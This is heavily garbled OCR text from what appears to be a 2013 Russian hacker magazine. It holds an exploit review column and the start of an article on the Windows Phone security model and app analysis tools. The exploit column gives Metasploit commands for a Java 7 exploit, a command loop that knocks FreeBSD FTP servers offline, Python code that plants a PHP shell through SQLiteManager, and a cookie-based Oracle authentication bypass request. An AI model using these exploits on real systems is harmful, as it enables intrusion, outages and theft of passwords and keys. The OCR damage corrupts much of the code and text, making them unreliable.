( Ме'І: Ь осі Н а псі 1 е . с 1 а 3 3 , С 1 а з $ . с 1 а з 5 ^ п.ем С І а 5 5 { ] { «-• 

МеТЬосІТуре.сІазз })^ 



МеТЬосІНапаіе ІосаІМеІіИосІНапсЛеІ = ІосаІІоокир.ЯпсІѴігТиаІ*-' 

(Ме1:РіосІНапсІ1ез. Іоокир.сіазз, ''РіпсІСопзТгисТог'' 4 ...^^ „ 

ІосаІМеТЬосІТуреІ) ; 

МеТИосІТуре 1осаІМеТМсІТуре2 Ме1:ЬоаТуре.те1:Ьос1Туре(Ѵоіс1.ТУРЕ) ; 
Ме1:ІіосІНапс11е 1оса1МеТИосіНап(і1е2 = (МеІіІірсІНапсІІе)*-- 
1осаІМеТІірсіНап(і1е1,іпуокеіліі-1;МАгбитеп'1:з(пеѵ\; 0Ьз‘ес1:[] { 
Іосаііоокир, ІосаІСІаззІ, 1оса1Ме1:ЬосІТуре2 }); 



ЕXР^ОIТ. Об уязвимости было известно еще в 2012 году из документа ЬіТ 
Іу/Хукіууі, который мы упомянули выше, но эксплойт появился только сейчас. 
Как пишет автор эксплойта, для его создания использовалась технология 
из 2013-0422. Для эксплуатации воспользуемся снова нашим любимым 
Меіазріоіі. 

тз-Р > изе ехр1оі1:/ти11:і/Ьгом5ег/зауа__зге17_те1;ИосІ_ІіапсІ1е 
тз-Р ехр1оіТ(дауа_зге17_теТЬосІ_Ьапаіе) > зеТ ТАКСЕ! 1 
тз-Р ехр1оіТ(зауа_зге17_теТЬо(1_Иапаіе) > зеТ РАѴЕОАО у-- 

міпсіомз/ехес 

тз-Р ехр1оі1:(зауа_дге17_те1:ІіосІ_ІіапсІ1е) > зеТ СМР саіе 

тз-Р ехр1оіТ(зауа_зге17_теТЬоОапсІ1е) > ехріоіт 

В этот раз для разнообразия вместо теіегргеіег или бэкдора возьмем 
для примера запуск калькулятора из командной строки. 

ТАНСЕТ5 . Заѵа7их-7и7 включительно. 

8011ІТІОЫ. Есть обновление. 



УДАЛЕННЫЙ ОТКАЗ В ОБСЛУЖИВАНИИ 
РВЕЕВЗО 9.1 РТРО 



риЬІіс МеТЬоаНапсІІе ііпсІѴігТиа1(С1азз<?> ге-Рс, БТгіп^ пате, 
МеТИосІТуре Туре) -Нігоіл/з МоЗисІіМеТЬосІЕхсерТіоп, 
І11е§а1АссеззЕхсер1:іоп { 

МетЬегМате теТИосІ. = гезо1уе0гРаі1(ге-Рс, пате. Туре, ,.е 

Та1зе)х... 



сЬеск5есигіТуМапабег( ге-Рс, теТЬосІ);. 
геТигп ассеззѴігТиа1(ге-Рс, теТЬоа)д 

} 



Такой способ использует функцию сРіескЗесигі^Мападег для проведения 
проверок, также определенных в вызывающем классе (и, как мы можем ви- 
деть, МеІІіосІНапсІІе, снова вызывающий класс): 



СѴ88ѵ2 
Дата релиза: 
Автор: 

СѴЕ: 



10 (АѴ:Р/АС:Т/Аи:М/С:С/І:С/А:С) 
2 февраля 2013 года 
Макзутіііап Агсіетоѵѵісг 
2011-0418 



Иногда старые уязвимости возникают вновь. Исследователь решил про- 
верить РТРб-серверы на В80 и обнаружил, что давняя уязвимость в ІіЬс (2011 - 
0418) работает в последних версиях РгееВЗО. Ранее разработчики МеШЗО 
и ОрепВЗО исправили данную уязвимость ШіМѵ/ѴѴЗТтгА ). РгееВЗО-шники 
тоже сделали заплатку в виде СТОВ_иМ1Т ( ЬіТІу/ІЗМиМЕб Т но она не работает. 
Примеры уязвимых серверов: 

Йр.ик.ТгееЬзсІ.огд, 

• Йр.иа.^гееЬзсІ.огд, 



ХАКЕР 04/171/2013 



Йрб.^гееЬзсІ.огд, 

^рб.из.ТгееЬзсІ.огд. 

ЕХРЮІТ 

Сам эксплойт довольно прост. Зацикливаем отправку следующих трех ко- 
манд на сервер: 

У5ЕК апопутрив 
РА55 апопутоиз 



5ТАТ {а,Ь}{а,Ь}{а,Ь}{а,Ь}{а,Ь}{а^Ь}{а,Ь}{адЬ}{а^Ь}{а,Ь}{а^ЬЬ 
{ад Ь}{а ^ Ь}{а д ЬНа ^ Ь}{ад ЬНа ^ Ь}{3д Ь}{а д Ь}{ад Ь}{адЬ}{а^Ь}{алЬЬ 

{адЬ}{адЬ}{адЬНадЬ}{а.Ь}{адЬ}{адЬ}{адЬ}{адЬ}{адЬ}{адЬ}{адЬ}- 

{а,Ь}{адЬ}{а,ЬКа,Ь}{а,Ь}{адЬ}{а,Ь}{а,Ь}{адЬ}{адЬ}{а,Ь}{а,ЬК 

(адЬ> -- 

И сервер больше не отвечает на команды пользователя. 
ТАВСЕТ8.РгееВ809.1. 

$О^^ТIОN. Патча наданный момент нет. Единственный совет: использо- 
вать вместо РТРсІ ѵзйрсі. 



иг11іЬ2.иг1ореп(5д1і-^еиг1 + "таіп.рІір?сІЬ5е1=%5&'^аЫе=«- 
1:етр'1:аЬ'' %сІЬІсІд игІепсрсіеСрагатз) , 120) 



..#..Всшвляем„код.^ 



иг11іЬ2.иг1ореп(5д1і1;еиг1 + туОЬРіІед ^рпед 120) 



# Удаляем БД.. 



иг11іЬ2,.и.г.1ор.е.п(5д1і'^еУг1 + "шіп.рИ 

&ѵіе\л/=&1:гі§§ег=&-Рипс1:іоп=&ас1:іоп=сІе1'' %сІЬІсІд Мопед. 120) 



рріпі 'БиссееУ' 
.геіигп 



Как видим, шелл запрятали в саму 801-базу, а не в отдельный РНР-файл, 
как обычно. Для поиска уязвимого софта можно воспользоваться следующим 
Соодіе-дорком: іпШІе:80У1еМападег іпигІ:зрІіІе/. 

ТАПСЕТ8. 80иіеМападег до 1 .2.4 версии включительно. 

80іиТІ0М. Заменить строку «80иіе8Шр8ІазМез($_Р08Т[’РЬраІІі'])» 
в файле /іпсІисІе/асІс1_сіаіаЬазе.рИр на «зіг_герІасе('.', ", 80иіе8ігір8ІазІіез($_ 
Р08Т[’с1ЬраШ']))>>. 



О-ОАУ; УДАЛЕННОЕ ВЫПОЛНЕНИЕ 
ПРОИЗВОЛЬНОГО КОДА 
В ЗОиТЕМАНАСЕК 1.2.4 
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С возросшей популярностью 80Ы1е под прицел исследователей попали 
средства управления этой БД. ЗОЫІеМападег интересен тем, что он исполь- 
зуется в некоторых «все в одном» веб-серверах, например ѴегІгідоЗегѵег. 
Сама уязвимость банальна — недостаточная проверка входящих параметров 
от пользователя, находится в файле /іпсІисІе/асІс1_с1а1аЬазе.рІір, в перемен- 
ной $_Р08Т[’с1ЬраШ’]. 

ЕХРЬОІТ. Зато интерес представляет реализация эксплойта, а точнее, шел- 
ла, который рассмотрим далее: 

сІе-Р таіп(): 



здіііеіігі = аг§ѵ[1] 
туОЬМате = "рИріп^о" 
туОЬРіІе = "рИріп-Рр.рИр" 



#..С.оздаем,.6.азу..данных 

рагатз = {'сІЬпате' : туОЬМатед 

' сІЬѴегзіоп ' ’ 2 ’ , 

’УЬРеаІраІЬ Ѵ ..^.^^М 

'сІЬра-Ыі' : туОЬРіІед 

' асіііоп ' ' заѵеОЬ ' } 

и г 1 1 і Ь 2 . и г Іореп ( еЦг 1 + т.а.і.п ..рбр " д 

иг1епсосІе(рагат5) д 120) 

# . Берем ...І.р...6.а.зы..ііа.н.н^^^^ 



сІЫсІ = ^еі^0ЬІФС5ЯІі1:еУг1 + ,рЬр\\, турЬМате^^ 



# -Если ...база создана^ 

і-р аыа: 

.„.#.С.озда.е.м..М.+...и! 



рагатз = { ’ОізрІауРиегу ' СКЕАТЕ ТАВЕЕ ІетрІаЬ 

( сос1е1:аЬ Іехі: );\п' + 

' ’ІМБЕКТ ІМТО ІетрІаЬ ѴДШЕБ . 

(\'<?рІір рНріп-Ро(); ипііпке.. 

(__ЕІЕЕ_); ?>\')Лп’д 



' зрІРіІе' 

’асіііоп' 

.'..здііуре' 



: Мопе, 

: ’5р1'д 

: •I-} 



ОБХОД АУТЕНТИФИКАЦИИ РЕЖИМА 
0ІА6Н0Ш МОРЕ В ОКАСІЕ 
АРРЫСАТІОН ЕПАМЕѴѴОЛК 

СѴ88ѵ2 6.4 (АѴ:Р/АС:1/Аи:М/С:Р/І:Р/А:М) 

Дата релиза: 15 января 2013 года 

Автор: ОаѵісІ Вугпе 

СѴЕ: 2013-0397 

Даже опытные разработчики из Огасіе могут допускать ошибки. Огасіе 
Арріісаііоп Ргагпеѵѵогк — библиотека, основанная на Заѵа, для создания 
веб-приложений. Чтобы упростить разработку, позволяет программисту за- 
пустить режим диагностики. После чего появляется соокіе с переменными 
ОАОіадпозІіс и ОАОеѵеІорегМосІе, равными 1 . Так вот, уязвимость заключает- 
ся в том, что не существует больше никаких проверок. 

ЕХРЮІТ, Для включения «режима бога» достаточно отправить следующий 
запросе нежелательными «печеньками»: 

СЕТ /ОА_НТМІ/рр.з5р?-РипсТіоп_іа=1038712&ге5р_ісІ=^23350&^ 
гезр_арр1_ісІ=80 

0&зесигіТѵ егоир ісІ=0&1апе сосІе=и$&рагат5=.1Ѵ1Т2і5ІіуКНсЕЗЕбт^ 
г2аВ91рИё41Ш-22ХХЗР0иаЗс1б-6АІдІАІІ2Ая00ы32сіуѴЕМ&оа5=д5-В0Ѵз0з^ 
7_2-Х5ТМТпеЗА.. 

НТТР/1.1 

Соокіе: ^5Е55IОNI^=Ь2■Р1079еЗсІ1ЬЬ96сЬ4ЬсI465а829сI42ее397609177е 
Ь2с4е28іТЬ 

7сІ1235-Р1153Ь2.еЗеРЫіаКЬЗяКеЗуМЬЗаМахіКау0; 0А0іа8ПОЗі:іс=1; 
б5І=2УАсІеА071:М955у58зеВО2СоХК9; 

ВІСір5егѵег§5іар_ігесгиі1:тепТ_Ы;1;р=1527б16141. 5150.0000; 
5_сс=Тгие; з_пг=1351286855771; §рѵ_р24=по%20ѵа1ие; 

§р\л/_е24=по%20ѵа1ие; 5_зд=%5В%5ВВ%50%50; 0А0еѵе1орегМосІе=1; 
огасіе, и іх=0'''"СЖ-6:0 

■Рз_посасИе_ёьісі=06О4170АС1745В5Е87ЕА9290121ЕРР01; ^ 
а1;§Р1а1:о5Трр=1 

После чего сервер перейдет в режим диагностики, то есть на каждой стра- 
нице появится ссылка на диагностику, где можно просмотреть настройки, 
включая пароли и ключи шифрования. 

ТАВСЕТ8. Огасіе Арріісаііоп Ргагпеѵѵогк 11.5.10.2, 12.0.6, 12.1.3. 

80ЮТІОМ. Есть обновление. □□ 
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МОБИЛЬНЫЕ ОКНА: 



ПРОВЕРКА НА ПРОЧНОСТЬ 



Разбираем по косточкам модель 
безопасности \Ѵіпдоіѵ$ РНопе 

Интерес к безопасности мобильных устройств рас- 
тет с каждым днем. И если безопасность платформ 
АпсІгоісІ и Ю8 уже достаточно хорошо рассмотрена 
как на страницах нашего журнала, так и на просто- 
рах Сети, то в случае с ѴѴіпРоѵѵэ РМопе существует 
большой информационный пробел, который мы 
сегодня постараемся восполнить. 

МОДЕЛЬ БЕЗОПАСНОСТИ 

Модель безопасности ѴѴіпсІоѵѵз РИопе основана на нескольких 
принципах: 

• СІіатЬегз 

• СараЫІШез 

• ЗапсІЬохіпд 

• Ізоіаіесі зіогаде 

• Арріісаііопз зідпіпд 



Первый принцип — это изолированные «камеры» (сІіатЬегз). 
Каждый программный код, работающий в ѴѴіпсІоѵѵз РИопе, рабо- 
тает в одной из нескольких камер. Камеры представляют собой 
ограничители безопасности, которые определяют, что код может 
делать и чего не может делать. В ѴѴіпсІоѵѵз РИопе 7 существует 
четыре камеры. Первая — ігизіесі сотри^іпд базе сИатЬег. Ядро 
ОС и драйверы, работающие в режиме ядра, запускаются в этой 
камере. Код, работающий в этой камере, обладает всеми разре- 
шениями, в том числе может изменять политику безопасности. 



й 

Дмитрий «01д1» 
Евдокимов 
Оідііаі ЗесигИу 

(3)еѵсІокітоѵсІ8 




Андрей Часовских 

©апсігеѵсііа 



Следующая камера — еіеѵаіесі гідМз сМатЬег. В этой камере ра- 
ботают драйверы в пользовательском режиме, а также сервисы 
ОС. Еіеѵаіесі гідіііз сИатЬег обладает тем же набором разреше- 
ний, что и Ігизіесі сотриііпд базе сбатбег, кроме возможности 
изменять политику безопасности. В зіапбагсі гідбіз сбатбег ра- 
ботают все предустановленные приложения, как от МісгозоЙ, так 
и от вендоров. И наконец, последняя камера — это Іеазі ргіѵііеде 
сбатбег. В ней работают все сторонние приложения. Главное 
отличие этой камеры от трех предыдущих в том, что она имеет 
динамический набор разрешений — он формируется на основе 
«возможностей» (сарабіііііез) каждого приложения. 

В ѴѴіпсІоѵѵз Рбопе 8 этот принцип был упрощен, но вместе 
с тем модель безопасности стала строже. Теперь есть всего две 
камеры: Ігизі сотриііпд базе сбатбег и Іеазі ргіѵііеде сбатбег. 
Для Ігизі сотриііпд базе сбатбег ничего не изменилось: тот 
же набор ПО и тот же набор разрешений. Все программы, ра- 
ботавшие в еіеѵаіеб гідбіз сбатбег и з^апсіагсі гідбіз сбатбег, 
теперь работают в бРС. Это потребовало серьезно расширить 
список «возможностей» (сарабіІШез) для того, чтобы гарантиро- 
вать, что для каждого несистемного кода, который запускается 
неустройстве, корректно настроена камера. 

Что же это за «возможности»? Это некий маркер, который 
говорит операционной системе о том, что приложение исполь- 
зует ту или иную функциональность. Например, приложение 
«Навигатор» объявляет, что использует сервис определения 
местоположения и доступ в интернет. При установке такого при- 
ложения операционная система сгенерирует сбатбег, основы- 
ваясь на объявленных возможностях. И если вдруг в процессе 
работы приложение попробует получить доступ к медиабибли- 
отеке, вывалится исключение. 

В ѴѴіпбоѵѵз Рбопе 8 было добавлено множество новых воз- 
можностей. Некоторые из них соответствуют новым софтвер- 
ным и хардверным фичам платформы, но большинство было 
добавлено для того, чтобы иметь возможность перенести все 
несистемное ПО в Іеазі ргіѵііеде сбатбег и сконфигурировать 
его. Эти возможности официально не задокументированы. 
Также существует еще ряд незадокументированных возмож- 
ностей, которые используются в приложениях МісгозоЙ и вен- 
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Мобильные окна: проверка на прочность 
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Концепция «песочницы» в ѴѴР 7/8 



доров. Наиболее интересная из них для ѴѴіпсІоѵѵз РІіопе 7 — это 
возможность напрямую обращаться к системным библиотекам 
(іп!егор зегѵісез). Однако обычным разработчикам запрещено 
использовать такие возможности, приложение просто не попа- 
дет в магазин приложений. 

Следующий принцип модели безопасности ѴѴіпбоѵѵз 
РНопе — это принцип песочницы (ЗапсіЬохіпд). Здесь дей- 
ствует несколько правил. Приложения не могут взаимодей- 
ствовать между собой. Ничего похожего на іп^епі-сообщения, 
как в АпбгоісІ, нет. Структура файловой системы скрыта от при- 
ложений, все операции ввода-вывода ограничены изолиро- 
ванным хранилищем (Ізоіаіеб зіогаде). У каждого приложения 
есть собственное изолированное хранилище, при этом доступ 
к нему ограничен только этим приложением. 

Изолированное хранилище (ІзоІаІесІ зіогаде) позволяет хра- 
нить данные тремя способами: набор ключ — значение (напри- 
мер, для сохранения настроек приложения), обычные файлы 
и база данных (5^^ Зегѵег СЕ). Это хранилище у каждого при- 
ложения свое, и никто, кроме самого приложения, туда доступ 
не имеет. 

Теперь перейдем ближе к приложениям. МісгозоИ также 
предпринимает шаги для того, чтобы распространение при- 
ложений сделать более безопасным. Все приложения имеют 
цифровую подпись (Арріісаііопз зідпіпд). Все сборки подписы- 
ваются, в том числе системные, приложения с неподписанны- 
ми сборками даже не могут быть установлены на устройство. 
И с августа 2012 года МісгозоИ изменила формат файла при- 
ложений таким образом, что теперь его содержимое не может 
быть распаковано. Если раньше ХАР-файл был всего лишь 2ІР- 



АРР-ТО-АРР ВЗАИМОДЕЙСТВИЕ В ѴѴР8 

В ѴѴіпсІоѵѵз РИопе 8 МісгозоЙ все-таки добавила два способа для взаимо- 
действия приложений между собой: файловые и ІІВІ ассоциации. Теперь 
любое приложение может объявить, что оно способно открывать файлы 
определенного типа или обрабатывать определенные ІІРІ (кроме заре- 
зервированных самой ОС). Зарезервированные типы файлов, например, 
ХАР, тзі, Ьаі, стсі, ру, иАР. Зарезервированные УРІ: НТТР, ІеІ, ѵѵаііеі, ШАР, 
гіодіп, Теіпеі. Если затем другое приложение попытается открыть файлы 
такого типа или такие УРІ, первое приложение будет запущено. 

И здесь появляется новый вектор атаки на приложение в ѴѴР8, которо- 
го не было в ѴѴР7. Теперь при некорректной или недостаточной настройке 
обработки параметров, передающихся через УРІ, можно потенциально 
выполнять нелегитимные действия. 




ѴѴАІШШС 



Внимание! Инфор- 
мация представлена 
исключительно с целью 
ознакомления! Ни авто- 
ры, ни редакция за твои 
действия ответственно- 
сти не несут! 



архивом и легко распаковывался после изменения расшире- 
ния, то сейчас формат ХАР-файла неизвестен. 

ВСЕО ПРИЛОЖЕНИЯХ 

Перейдем непосредственно к приложениям и начнем с того, 
как они работают и на чем пишутся. ѴѴіпсІоѵѵз РИопе 7 основана 
на ѴѴіпсІоѵѵз СЕ, а все ѴѴР7-приложения работают на модифици- 
рованной версии .МЕТ Сотрасі Егатеѵѵогк. Это специальная вер- 
сия .МЕТ-фреймворка, в которую МісгозоЙ добавила ЗіІѵегІідИІ УІ 
и ЗіІѵегІідРІ АРІ. В ѴѴР7 разработчики могли писать приложения 
только с использованием управляемого кода. Как упоминалось 
ранее, есть и возможность интеропа, позволяющая выполнять 
нативный код, однако МісгозоЙ не разрешает использовать ее 
обычным разработчикам. В ѴѴіпсІоѵѵз РИопе Зіоге всего около 50 
приложений, написанных с использованием нативного кода, — 
их разработчики имеют специальное разрешение от МісгозоИ. 

В ѴѴіпсІоѵѵз РІюпе 8 есть значительные отличия в плане раз- 
работки приложений. Во-первых, сама операционная система 
имеет общее ядро с ѴѴіпсІоѵѵз 8 — тот же набор базовых ком- 
понентов, что и десктопная винда. Во-вторых, приложения ра- 
ботают на «взрослой» версии .МЕТ-фреймворка под названием 
СогеСЕР. Это та же самая версия СЕВ, на которой работают 
обычные ЗіІѵегІідИІ-приложения. 

В ѴѴіпсІоѵѵз РІюпе 8 сохранился весь старый АРІ, так что 
функции ѴѴіпсІоѵѵз РІюпе 7 полностью совместимы с новой плат- 
формой и продолжают работать. Более того, МісгозоИ добави- 
ла множество новых фич для разработчиков приложений. Они 
поддерживаются новым АРІ самого .МЕТ-фреймворка, а также 
в ѴѴіпРІюпеВТ и ОігесІХ АРІ. ѴѴіпРІюпеВТ является подмноже- 
ством ѴѴіпВТ — нового АРІ для приложений, который МісгозоИ 
позиционирует как замену старому ѴѴіп32 АРІ. 
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С появлением ѴѴіпсІоѵѵз РІіопе 8 разработчики 
могут писать приложения на С/С++. Однако ис- 
пользование этих языков ограничено написанием 
кода, который работает с ѴѴіпРІіопеВТ или ОігесіХ, 
а также с другими нативными библиотеками. Код, 
который не подходит под эти требования, и весь 
пользовательский интерфейс по-прежнему долж- 
ны быть написаны с использованием управляе- 
мых языков. 

Нас не может не радовать наличие нативного 
кода: говорим «привет» таким багам, как Ви^ег 
оѵеіііоѵѵ, изе-айег-^гее и подобные. 

ВНУТРЕННОСТИ \ѴР-ПРИЛОЖЕНИЯ 

Что же представляют собой ѴѴіпсІоѵѵз РИопе 
приложения? Готовое приложение — это файл 
с расширением ХАР (аналогично ЗіІѵегІідИІ- 
приложениям). Внутри находятся сборки, ре- 
сурсы и несколько специальных файлов ма- 
нифестов. Манифест приложения аналогичен 
такому же файлу в 5іIѵе^IідI^^приложенияx. Ма- 
нифест приложения ѴѴіпсІоѵѵз Рііопе содержит 
специфичную информацию, например включа- 
ет в себя список возможностей. 

Файловая структура приложения 

• Сборка приложения 

• Ресурсы 

• АррМапіТезйхатІ 

• ѴѴМАррМапі^езІ.хтІ 

• ѴѴМІп^егорМапіІезІ.хтГ 

• — опционален в ѴѴР7, отсутствует в ѴѴР8 



ПОПАДАЕМ В МАГАЗИН 

Итак, у тебя есть приложение и желание начать распростра- 
нять его. Сначала нужно отправить приложение на серти- 
фикацию в ѴѴіпсІоѵѵз РИопе 8іоге. В процессе сертификации 
МісгозоЙ проводит множество проверок. Самая интересная 
заключается в том, что код приложения подвергают стати- 
ческому анализу, чтобы выяснить, какие возможности при- 
ложение на самом деле использует. Ты можешь отправить 
приложение, указав полный список возможностей, однако 
во время сертификации будут оставлены только те возмож- 
ности, которые реально используются. 

В конце сертификации МісгозоЙ подписывает все сборки, 
потом подписывается ХАР-файл (добавляется файл с подо- 
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ѴѴР-приложение на устройстве 
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Когда ты устанавливаешь приложение, 
ХАР-файл распаковывается и все его содер- 
жимое сохраняется в отдельную папку 



бием контрольной суммы), а затем изменяется формат само- 
го ХАР-файла таким образом, что он не может быть открыт 
на просмотр. 

ПОПАДАЕМ НА УСТРОЙСТВО 

Когда ты устанавливаешь приложение, ХАР-файл распаковы- 
вается и все его содержимое сохраняется в отдельную пап- 
ку приложения. Вот как приложения хранятся на устройстве. 
В корне диска существует папка Арріісаііопз. Внутри нее есть 
папка ІпзіаІІ, которая содержит папки для каждого приложения. 
Название каждой папки — это уникальный идентификатор при- 
ложения в ѴѴіпсІоѵѵз Рііопе 81оге, который берется из манифест- 
файла. Как мы упоминали выше, каждое приложение имеет 
свое собственное изолированное хранилище. Они хранятся 
в папке Оаіа, которая также содержит отдельные папки под каж- 
дое приложение. Вот так выглядит распакованное приложение 
на ѴѴіпсІоѵѵз РИопе 7 устройстве. 

\Арр1іса1:іоп5 

\Іп5'І:а11\<Ргос1ис1:І0>ѴІп5'Ьа11\ 

- Содержимое из ХАР 

- ЫМАррРРНеасІег.хтІ (подпись) 
\0а1:а\<РгосІис1;І0>\0а1;а\І5ОІа1:есІ51:огабе 

Пути в ѴѴіпсІоѵѵз РРопе 8 отличаются — они больше похожи 
на обычные виндовые пути (С:\Оаіа\Ргодгатз\<РгосІисІЮ>\ 
1пз1а11\), но общая идея раздельного хранения приложений 
и хранилищ остается. 

В БОЙ 

Для начала немного теории по поводу анализа защищенности 
мобильного приложения. В процессе анализа просматрива- 
ются три вещи: приложение, канал связи и сервер. При ана- 
лизе канала связи и сервера все как обычно: подмены сер- 



История ѴѴіпсІоѵѵз РНопе 

- Наследник ѴѴіпсІо\л/5 МоЬіІе 

- 15 марта 2010 — анонс ѴѴіпсІоѵл/5 РЬопе 7 

- 21 октября 2010 — релиз ѴѴіпсІоѵл/з РЬопе 7 

- 29 октября 2012 — релиз ѴѴіпсІоѵѵз РЬопе 8 
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Развитие ѴѴіпсіоѵѵв РЬопе 
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КРАТКО 

ОБ ИНСТРУМЕНТАЦИИ 



Это техника добавления собственного 
кода в программу/окружение для мони- 
торинга или изменения некоторого по- 
ведения исследуемой программы. Сборки 
ѴѴіпсІоѵѵз РИопе приложений содержат про- 
межуточный СІЬкод, который выполняется 
СІР. Именно этот код модифицируется 
для того, чтобы внести в него дополнитель- 
ную функциональность. Например, у нас 
есть метод, который складывает два числа 
и возвращает результат. Ниже версия ^ 
этого же метода, проинструментирован- ги 

ная таким образом, что результат метода 
выводится в консоль. 
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тификатов, прокси, модификация трафика, сканирование 
портов, уязвимости серверной стороны — в общем, никакой 
мобильной специфики. Сейчас нас это не интересует. Мы 
остановимся на приложении. 

При анализе безопасности мобильного приложения 
можно выделить три основных этапа. Подготовка окруже- 
ния заключается в получении приложения и его распаковке 
(как в случае с ѴѴР-приложением) или дешифровании (как 
в случае с Ю8-приложениями). Также необходима настройка 
рабочего окружения — это может быть эмулятор или устрой- 
ство. Затем можно перейти к статическому анализу кода, ко- 
торый заключается в анализе параметров компиляции (таких 
как ОЕР, А81Р, зіаск соокіе), просмотре файлов метаданных 
(в них, как правило, содержится описание возможностей 
приложений и их настройки типа регистрируемых ІІРІ) и, на- 
конец, анализе самого кода приложения (анализ используе- 
мых АРІ, просмотр используемых констант и строк и так да- 
лее). И динамический анализ — мы смотрим, как приложение 
взаимодействует с сервером по сети, как взаимодействует 
с файловой системой, и производим гипііте собе апаіузіз. 

Подготовка окружения: 

• получение приложения (распаковка/расшифровка); 

• настройка устройства/эмулятора. 

Статический анализ: 

• анализ свойств сборки; 

• анализ метаданных: 

• анализ кода. 

Динамический анализ: 

• как приложение взаимодействует с ФС и сетью; 

• анализ кода в процессе выполнения. 

Все, кто так или иначе занимается безопасностью мо- 
бильных приложений, знают об ОѴѴА8Р Тор 10 МоЬіІе Різкз. 
Данный список применим к любой мобильной платформе и, 
можно сказать, содержит в себе все классические уязвимо- 
сти, то есть то, что не касается специфики самой платформы. 
Например, все приложения могут хранить критичные данные 
в открытом виде или неправильно использовать криптогра- 
фию. Данный список можно применить и к приложениям 
для ѴѴіпбо\л/з РИопе — исключением он не является. Большин- 
ство из проблем, перечисленных в этом Тор- 10, можно до- 
статочно просто идентифицировать, используя статический 
анализ и анализ потоков данных. Поэтому здесь не хотелось 
бы останавливаться, так как искать опасные АРІ-вызовы и от- 
сутствие защитных механизмов умеют все. 

Как исследователь безопасности, я люблю больше другие 
баги — логические. Я люблю исследовать недра программы 
и полностью разбираться в принідипах и механизмах ее ра- 
боты, восстанавливать алгоритмы и так далее. Как правило, 
искать логические баги намного сложнее, но эксплуатиру- 




Жизненный цикл при- 
ложения для ѴѴР 
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ОѴѴАЗРТорЮМоЬіІе 
Різкз: Ы!.|у/ф1Р2Т 

Страничка 
проекта Тапдегіпе: 
оіІРиЬ.сот/ 
апРгеѵсНаЛапоегіпе 



ются они намного проще — с ними нет никаких игр с низко- 
уровневой работой с памятью (как при Ьи^^ег оѵеіііоѵѵ) и нет 
никаких защитных механизмов (как при фильтрации симво- 
лов от Х88 или 80Ы). А искать сложнее, потому что во вре- 
мя аудита за ограниченное время надо понять, как работает 
программа — какой логикой руководствуется при различных 
ситуациях. И естественно, для анализа приложения и для по- 
иска уязвимостей нужен софт... Давай посмотрим, что у нас 
на сегодняшний день есть для анализа ѴѴіпбоѵѵз РИопе прило- 
жений и что нам поможет искать баги из ОѴѴА8Р Тор 10 МоЬіІе 
Різкз, а что — логические баги. 

ИНСТРУМЕНТЫ ХАКЕРА 

Для работы нам, понадобится ѴѴР 80К с эмулятором. ѴѴР- 
устройство с полной разблокировкой, которая дает нам до- 
ступ к файловой системе устройства и возможность ставить 
свой софт без официального магазина. Здесь стоит отметить, 
что в своей работе мы используем НТО Него с кастомной про- 
шивкой. Чтобы удобно было лазить по ФС и ставить софт, потребу- 
ется ѴѴіпбоѵѵз РИопе Оеѵісе Мападег, который можно скачать с ХОА. 

• Устройство 

• Полная разблокировка 

• Эмулятор 

• ѴѴіпРоѵѵз РІіопе Оеѵісе Мападег 

• Сетевые прокси: Вигр 8иі1е, СИагІез... 



Все приложения могут хранить критичные 
данные в открытом виде или неправильно 
использовать криптографию 



КОМПИЛЯЦИЯ В ОБЛАКЕ И МОИ 

В ѴѴіпсІоѵѵз РИопе 8 МісгозоЙ ввела компиляцию 
в облаке. Теперь, когда ты отправляешь свое 
приложение в 8іоге, оно содержит СІЬсборки. 
На своей стороне (в облаке) МісгозоЙ компи- 
лирует их в новый формат — МОІІ (МасНіпе 
Оерепсіепі Іпіегтесііаіе 1_апдиаде) сборки. Так 
что, когда ты скачиваешь приложение на устрой- 
ство, оно содержит МОІІ-сборки. В процессе 
установки эти сборки линкуются и выполняется 
нативный код. Все это сделано в первую очередь 
для повышения производительности работы 
приложений. 

МОІІ является запатентованным и докумен- 
тированным представлением. На сегодняшний 
день существует только один инструмент для 
чтения МОІІ — МОІЕ Оитр. 
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Взлом 
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• . N ЕТ -тул зы ; . Меі РеТІесІог, I ІЗру. . . 

• ЮА Рго 

• РАІМ 

• ѴѴіпсІоѵѵз РІіопе Арр Апаіугег 

• ХАРЗру 

• ХарЗруАпаІузіз 

Все инструменты, которые могут быть полезны в процессе 
анализа защищенности Ѵ\/Р-приложений, можно условно раз- 
делить на две большие группы: общие инструменты для ана- 
лиза .МЕТ-приложений и ѴУіпсІоѵѵз Рііопе ориентированные. Мы 
остановимся на инструментах из второй группы: 

• РАІМ от Воуап Ваікапзкі — это инструмент для анализа и ре- 
дактирования ХАР (ЗіІѵегІідМ / ѴѴіпсІоѵѵз РИопе приложений) 
и .МЕТ-сборок (сіІІ/ехе). 

• ѴѴіпсІоѵѵз РИопе Арр Апаіугег, разработанный Дэвидом Ру- 
ком (Оаѵісі Роок ака зесигііу піп]а), предназначен для ста- 
тического анализа ѴѴіпсІоѵѵз РІюпе приложений, и для этого 
программа может использовать различные библиотеки 
для анализа .МЕТ-кода, типа РохРго. 

• ХАРЗру от ВеНгапд Роиіабі из ЗепзеРозІ — это инструмент 
для динамического анализа. Программа трассирует все вы- 
зовы функций и выводит в консоль имя функции и ее пара- 
метры. Также для графического отображения результатов 
работы данного инструмента Дэвид Рук написал расшире- 
ние ХарЗруАпаІузіз, которое позволяет представлять ин- 
формацию в более удобном виде. 

Все рассмотренные инструменты работают только с .МЕТ- 
кодом. Инструментов мало, и большинство из них нацелены 
на статический анализ, но одного статического анализа при ка- 
чественном анализе недостаточно. Отсутствие инструментов 
для динамического анализа ѴѴР-приложения связано с тем, 
что ЮЕ позволяет отладку только при наличии исходных кодов 
и на ѴѴР-устройствах отсутствует программируемый отладоч- 
ный интерфейс, также препятствие представляет сложность 
анализа управляемого кода. Но мы решили не вешать нос и за- 
действовать статическую инструментацию байт-кода. 

НАШЕДЕТИЩЕТАМСЕНІЫЕ 

Тапдегіпе — это тулза для анализа ѴѴіпсІоѵѵз РИопе приложе- 
ний. Она основана на ХАРЗру и позволяет делать три вещи. 
Во-первых, автоматизировать всю рутинную работу с ХАР- 
файлами: распаковку, подписывание, упаковку, разворачива- 
ние на девайсе или эмуляторе. Во-вторых, Тапдегіпе позволяет 
проводить базовый статический анализ кода. После открытия 
приложения Тапдегіпе выводит информацию из манифеста 
приложения: общую информацию, список возможностей и так 
далее. Также производится декомпиляция исходного кода, 
можно посмотреть структуру кода. Более того, Тапдегіпе про- 
водит анализ кода методов и указывает на методы, в которых 
используется потенциально опасный АРІ: работа с файловой 
системой, работа с сетью и работа с криптографией. 

